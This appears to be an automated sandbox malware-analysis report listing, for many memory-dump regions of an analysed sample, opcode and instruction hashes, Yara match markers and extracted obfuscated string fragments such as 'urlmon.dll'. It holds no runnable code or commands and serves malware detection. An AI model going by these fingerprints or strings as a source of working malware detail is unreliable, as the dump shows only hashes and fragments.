                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6$O$S$\$s
                                                                                                                                            • API String ID: 0-3854637164
                                                                                                                                            • Opcode ID: a2ced896bf2eb68bd1ffbb5babfb8c7180e26c947224ebe42116047bacd2173a
                                                                                                                                            • Instruction ID: 86ea44bba224f05aecc21b7409607e4eda49324f0fdb8996561cc799247d20e5
                                                                                                                                            • Opcode Fuzzy Hash: a2ced896bf2eb68bd1ffbb5babfb8c7180e26c947224ebe42116047bacd2173a
                                                                                                                                            • Instruction Fuzzy Hash: 9951B4B2E10118AADB10EF94DD88EFFB3B8EF94305F044299E90C57150E771BA548BE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 39137a999f740dc4985b3fe52fa6432cad8dbf4fe8b24fb933e2fb3e352a29b6
                                                                                                                                            • Instruction ID: 868c29f444d4b0c7321b6ec49ac725dc9a784c68b5e87c56c7339bfd7e57a106
                                                                                                                                            • Opcode Fuzzy Hash: 39137a999f740dc4985b3fe52fa6432cad8dbf4fe8b24fb933e2fb3e352a29b6
                                                                                                                                            • Instruction Fuzzy Hash: 4A52C0B0E15229CBEB64CF44C894BDDBBB2BB85308F1081D9C14D6B291DBB56AC9CF54
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4f28d965c0b5026018bb0ee0abbbbc594de457b2d91534b391dd8117986a93d0
                                                                                                                                            • Instruction ID: 57ceadc40108c83db092e55815e411e6c0065842c3229fc43fb7b509142e2f3e
                                                                                                                                            • Opcode Fuzzy Hash: 4f28d965c0b5026018bb0ee0abbbbc594de457b2d91534b391dd8117986a93d0
                                                                                                                                            • Instruction Fuzzy Hash: 2F4131B1D11218BFDB00CF99DD81AEEBBBCEF49710F10815AF908E6244E3B09641CBA4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a1fb85d4fb09fb6326c2989eb37b364607dee7bbdebdace034762fffc947c14d
                                                                                                                                            • Instruction ID: ad87cd7c7b36c21048a790d853d52fad8ddaf48dcf2046725685ac2bb522aaaf
                                                                                                                                            • Opcode Fuzzy Hash: a1fb85d4fb09fb6326c2989eb37b364607dee7bbdebdace034762fffc947c14d
                                                                                                                                            • Instruction Fuzzy Hash: 8E31FC71A10748AFDB14DF98DD81EEF77B8EF89314F108609F919A7240D774A911CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 95a31cb8bc54784deccbb5f61a670964814556ad2616dacb61fa8a45566db6e2
                                                                                                                                            • Instruction ID: 30aacc4fa5cb1aaca16e8b3b950421c17200a1be68469b04687af145fe65ec98
                                                                                                                                            • Opcode Fuzzy Hash: 95a31cb8bc54784deccbb5f61a670964814556ad2616dacb61fa8a45566db6e2
                                                                                                                                            • Instruction Fuzzy Hash: 8221F8B1A14718AFDB14DF58DC81EEFB7B8EB89714F008509F919A7280D770A911CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9314687a4d3d00e3645cc920d30b5f29ce94d43908641f3a94f2d1207e57d058
                                                                                                                                            • Instruction ID: 4fd4e8128fea01d71965f55fa6273ef2a52cc89b62582a16f730a032fe9adb1b
                                                                                                                                            • Opcode Fuzzy Hash: 9314687a4d3d00e3645cc920d30b5f29ce94d43908641f3a94f2d1207e57d058
                                                                                                                                            • Instruction Fuzzy Hash: F91186B23802157BF720AA598C82FAB779CAB84F15F244015FB08AA2C1D6A4F81146B9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 709d7e7604c08484369c6834e6242913435d0670c9ac66c480427806cc03c73a
                                                                                                                                            • Instruction ID: 5ab83d4174b46e68a6dfcf31263bdc5eb91bd9b095ada80f56076d96df679762
                                                                                                                                            • Opcode Fuzzy Hash: 709d7e7604c08484369c6834e6242913435d0670c9ac66c480427806cc03c73a
                                                                                                                                            • Instruction Fuzzy Hash: FC114C71614714BFEB10EB68CC41FEB77A8EB86714F008509FA09AB280D7747901C7A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 54b98381ec20bdd24b73bce386d245720ef4ee7bc42a88f554b5ade1a049834c
                                                                                                                                            • Instruction ID: d30af5a7e2d0bf1ac84361396a0d66107b4b133ffb1a08e6446f55c6a005aa06
                                                                                                                                            • Opcode Fuzzy Hash: 54b98381ec20bdd24b73bce386d245720ef4ee7bc42a88f554b5ade1a049834c
                                                                                                                                            • Instruction Fuzzy Hash: F4114C71614714BBEB10EBA4CC41FEB77ACEB86714F008509F919AB280D7747911C7A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 833ab006bb41b768f24449d9343a3f098698b46f778c2dd17de6ec4eeed56b87
                                                                                                                                            • Instruction ID: a664b4bff88eb479f28d322d0425746fdaf37d6cc56e23e7fa2a0f52e05f16ed
                                                                                                                                            • Opcode Fuzzy Hash: 833ab006bb41b768f24449d9343a3f098698b46f778c2dd17de6ec4eeed56b87
                                                                                                                                            • Instruction Fuzzy Hash: 3F1100B6E01218AF9B00DFA9D9419EFB7F9FF88210F04466AE915E7200E7745A15CBE1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c683bd8c5f58cdb1a8279bf47339108df9a9eca5719a5ace5cb5d8630091204d
                                                                                                                                            • Instruction ID: 410d47767f0514e077d8b8dba5b46b92af484783c4c8b4f15bbb3c824a644efa
                                                                                                                                            • Opcode Fuzzy Hash: c683bd8c5f58cdb1a8279bf47339108df9a9eca5719a5ace5cb5d8630091204d
                                                                                                                                            • Instruction Fuzzy Hash: 78111FB6D0121CAF9B00DFA9D8409EEBBFDEF48200F04416AE919E7200E7709A01CBA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c8fd76cc1cdff96f6b08b796fba4466c0dd4da559138ac1ff1c37e8a17a1c88c
                                                                                                                                            • Instruction ID: e5ce32e2e48fb967645963409b5a154e5a039f78c82315586836c57b04a07dfc
                                                                                                                                            • Opcode Fuzzy Hash: c8fd76cc1cdff96f6b08b796fba4466c0dd4da559138ac1ff1c37e8a17a1c88c
                                                                                                                                            • Instruction Fuzzy Hash: 7B01CCB2214508BBDB04DF89DC80EEB77ADAF8C714F008208BA09A3240D630F851CBA4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 008325e310a8952cd5066dcd62ec20ba238476d60bc5e19f268ef2484d34732f
                                                                                                                                            • Instruction ID: 47168d78734fde263df96e130fb17cac2ea80ca08afc4f8d2094a6c57d58c405
                                                                                                                                            • Opcode Fuzzy Hash: 008325e310a8952cd5066dcd62ec20ba238476d60bc5e19f268ef2484d34732f
                                                                                                                                            • Instruction Fuzzy Hash: 45012DB6C01219AFDB40DFE8D9409EFBBF8AB08204F04466AD505F3200F7705A04CBA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4841933730f8fc0c318796336bc5a32e8d0906fa290c2c4d5f3f03826db57fe2
                                                                                                                                            • Instruction ID: 998acc7434416265e9f854a967b43f3354362a524281f85588e3bd99b9d3b73b
                                                                                                                                            • Opcode Fuzzy Hash: 4841933730f8fc0c318796336bc5a32e8d0906fa290c2c4d5f3f03826db57fe2
                                                                                                                                            • Instruction Fuzzy Hash: 74F0E9737602526BE7105A5CBC80B96B7CCEB94334F248162F81C87292E635E4518760
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8db3f7784aed1fa3a20781010672b3f2e76811cc386e83de3f2fc8017ffd9428
                                                                                                                                            • Instruction ID: 166f07778784fbfacc79723b0a439e2ab16879cebec248ed5b4dc5e049dffb7d
                                                                                                                                            • Opcode Fuzzy Hash: 8db3f7784aed1fa3a20781010672b3f2e76811cc386e83de3f2fc8017ffd9428
                                                                                                                                            • Instruction Fuzzy Hash: 34F0BB71D246187AEB10EB60CC49EEF7378EFC8704F000285E90CA6150E6706A858B65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: acd5afb23d2719ecc6722df42d608edcd1e25a63ad32306f79fe95be0704f7ac
                                                                                                                                            • Instruction ID: a8b5f4bc05e64076fc2c54c2c177eee82ec567f839d5253f4cf288de1204fddd
                                                                                                                                            • Opcode Fuzzy Hash: acd5afb23d2719ecc6722df42d608edcd1e25a63ad32306f79fe95be0704f7ac
                                                                                                                                            • Instruction Fuzzy Hash: 0CF0F8752006087BD710DE99DC81EAB77ADEFC9610F004409BA19A7240D670B9118BB4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                            • Instruction ID: c1153362bad01a28e3167ffe46459d513ff137c5737b5f488aa058845aad18bd
                                                                                                                                            • Opcode Fuzzy Hash: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                            • Instruction Fuzzy Hash: 54E09A722007087BDB10EE59DC81EAB77ACEFC9718F000408FA09A7281D731B811CBB4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b6bef720faee9834855caf57942a688cf2c396a758853a73bacac07e7a767cd9
                                                                                                                                            • Instruction ID: 8fac7373ab77eb4886c7e7181695d8f1ea76e268fb90bb45633af4f5837d2076
                                                                                                                                            • Opcode Fuzzy Hash: b6bef720faee9834855caf57942a688cf2c396a758853a73bacac07e7a767cd9
                                                                                                                                            • Instruction Fuzzy Hash: 41F08271915209EBDB14DF64D981BDDBBB4EB04320F1083ADE829DB280E634A791DB81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 98916a61b8e75f332174aed77556191114f68fd900517120307ddc62edce6984
                                                                                                                                            • Instruction ID: 8e0667f5e26d093b4e46d5700505d0555aa070af1216d4e920c8e21ac8928abb
                                                                                                                                            • Opcode Fuzzy Hash: 98916a61b8e75f332174aed77556191114f68fd900517120307ddc62edce6984
                                                                                                                                            • Instruction Fuzzy Hash: CEE04F36710A3437D6206689AD05F9BB76C8BC1EA0F550165FE089B344E564F91182E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                            • Instruction ID: 888a9e0fd08f8b7c3f9ba7dfa9fe9a3e298a67e5b3efe1bdaf58887bd39cb424
                                                                                                                                            • Opcode Fuzzy Hash: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                            • Instruction Fuzzy Hash: 68E046322006547BE220EA59DC40FAB7B6CEBC6724F008459FA19AB281C770B90186A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 06dc609bd8c3b56ba2c3c06c1ef89fc59572966a461adb86bbd7db54783abadc
                                                                                                                                            • Instruction ID: 2d159a622996f0d5c3d8bec3f3794ab69f21dfe28cb828049b636425cfe43be2
                                                                                                                                            • Opcode Fuzzy Hash: 06dc609bd8c3b56ba2c3c06c1ef89fc59572966a461adb86bbd7db54783abadc
                                                                                                                                            • Instruction Fuzzy Hash: 71D05EB6760252ABF721491CBD45BA523C8EB50214F688052E909C5092E269B4544A60
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                            • API String ID: 0-1002149817
                                                                                                                                            • Opcode ID: e08436c46dcda3a1c5b87106769f13452f25b3ab7fe7b4d2c9e97abee17da9f9
                                                                                                                                            • Instruction ID: 011fca65bdbc4ccdad598c465245371ee141d7dd0886198695e6447fef9f640e
                                                                                                                                            • Opcode Fuzzy Hash: e08436c46dcda3a1c5b87106769f13452f25b3ab7fe7b4d2c9e97abee17da9f9
                                                                                                                                            • Instruction Fuzzy Hash: 2FC140B1D10368AEEB60DFA4CD44BEEBBB8AF05304F0081D9D54CA7251E7B55A88CF95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                                            • API String ID: 0-3236418099
                                                                                                                                            • Opcode ID: 7a6265ed6c074ec5a680c1c6385fc526b172f02174e38290da54db5891ad1fad
                                                                                                                                            • Instruction ID: 2d326c479db3f49384eb9fcd31bc14eee6aa37aa614e570d9c917a29cd7e0f67
                                                                                                                                            • Opcode Fuzzy Hash: 7a6265ed6c074ec5a680c1c6385fc526b172f02174e38290da54db5891ad1fad
                                                                                                                                            • Instruction Fuzzy Hash: 429177B1A10628AEEB10EF94CD44FFEB7BDEF54309F004199E50CA6150E7756B898FA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #>&"$$)jq$$8=5$4#~c$4~be$70#8$9#><$:>xq$=8:4$==0~$>38=$>85q$Q$~dbf$~dbf
                                                                                                                                            • API String ID: 0-1240490747
                                                                                                                                            • Opcode ID: a3fb99092817e017cc47b6f3203fe747afccd389775cb871f9b1a367d5177fc9
                                                                                                                                            • Instruction ID: 3cbd1f8817e01d003a1f0febe74167fc2ea41b2523f10fcd77de6bece7d78463
                                                                                                                                            • Opcode Fuzzy Hash: a3fb99092817e017cc47b6f3203fe747afccd389775cb871f9b1a367d5177fc9
                                                                                                                                            • Instruction Fuzzy Hash: 3D41FEB4D043ACCEDB20DF96EA4169EBF74BB01300FA08188D8596F256C3714A85CF96
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                                                            • API String ID: 0-392141074
                                                                                                                                            • Opcode ID: cc92ae385e8ddcb07bddb7dff496512489b6e781b8b30774c2f7824f3b2c4b96
                                                                                                                                            • Instruction ID: 97226bd1bc3d8cc92e79c1dd9b9cf45a2248a0949be3cc917cf33f4ede518dda
                                                                                                                                            • Opcode Fuzzy Hash: cc92ae385e8ddcb07bddb7dff496512489b6e781b8b30774c2f7824f3b2c4b96
                                                                                                                                            • Instruction Fuzzy Hash: 9D7144B1D10328BAEB61EF94CD40FEEB7BCAF48704F404699E50DAA150EB7167888F55
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                            • API String ID: 0-685823316
                                                                                                                                            • Opcode ID: 59ecb204a4265fc6942e1a58fb515e6a521562753568dc872a3a96ceefea5280
                                                                                                                                            • Instruction ID: 54550cacfd1e4ec24ca385dbc7ff44236189d8706d1a57a5acda109a63258832
                                                                                                                                            • Opcode Fuzzy Hash: 59ecb204a4265fc6942e1a58fb515e6a521562753568dc872a3a96ceefea5280
                                                                                                                                            • Instruction Fuzzy Hash: 423186B5D11218BAEF50DFE0CC85FEEBBB9AF08704F00815DE608B6180DBB556488FA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                            • API String ID: 0-2304485323
                                                                                                                                            • Opcode ID: 2a7ac6222db87f748d194bb35895f9f7a671fb900d299c570de6db16c354100e
                                                                                                                                            • Instruction ID: 1f5f7b3990d7a2df3c61d07288068239fed11651405cf3bbb473aaceeb53b73f
                                                                                                                                            • Opcode Fuzzy Hash: 2a7ac6222db87f748d194bb35895f9f7a671fb900d299c570de6db16c354100e
                                                                                                                                            • Instruction Fuzzy Hash: 01D1FAB1A20715ABDB10EFA4CD84FEEB3F8AF58304F044A1DE609D7144E778AA05CB61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                                                            • API String ID: 0-2304485323
                                                                                                                                            • Opcode ID: fef980a485246701f4931c65b797c7d3dea23eb1b0bcd6f5f26c96f2cbce3b7c
                                                                                                                                            • Instruction ID: 78310396704c9c4de7ca856b6df8c8384a3751d2b982254c62e76c6b00417a50
                                                                                                                                            • Opcode Fuzzy Hash: fef980a485246701f4931c65b797c7d3dea23eb1b0bcd6f5f26c96f2cbce3b7c
                                                                                                                                            • Instruction Fuzzy Hash: DB8119B1A10719AFDB10EFA4C984BEEB7F8BF58304F00451DE509E7240E778AA05CB65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$P$e$i$m$o$r$x
                                                                                                                                            • API String ID: 0-620024284
                                                                                                                                            • Opcode ID: 2b748c70e9012bf6e0f7e794cab474ede7056ff7083a42bf2ba7564bda5bbe94
                                                                                                                                            • Instruction ID: 07c240fc088f16256da1fc5f62a948ed0a244e53121a810c1d4065fedfc3cc7f
                                                                                                                                            • Opcode Fuzzy Hash: 2b748c70e9012bf6e0f7e794cab474ede7056ff7083a42bf2ba7564bda5bbe94
                                                                                                                                            • Instruction Fuzzy Hash: 444197B1910228B6EB10FFA4CD44FEF737CAF54304F408699A50DA7140EBB5A7988FA1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_3e80000_vTCmFjyxUmdTJX.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: L$S$\$a$c$e$l
                                                                                                                                            • API String ID: 0-3322591375
                                                                                                                                            • Opcode ID: 5daa92b9d0800068dae9c2c23e536f96bf04feac8401b9ebc05b0c900dbb2435
                                                                                                                                            • Instruction ID: 1cab2ba039ee9130efc4be551f04639d85fc627e81622aa19cd51f8fe42baa39
                                                                                                                                            • Opcode Fuzzy Hash: 5daa92b9d0800068dae9c2c23e536f96bf04feac8401b9ebc05b0c900dbb2435
                                                                                                                                            • Instruction Fuzzy Hash: 6C4156B2D10628BEDB10EF98DC84FEFB7F8BF88304F054659D909A7140E775A6458B94
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Offset: 03E80000, based on PE: false
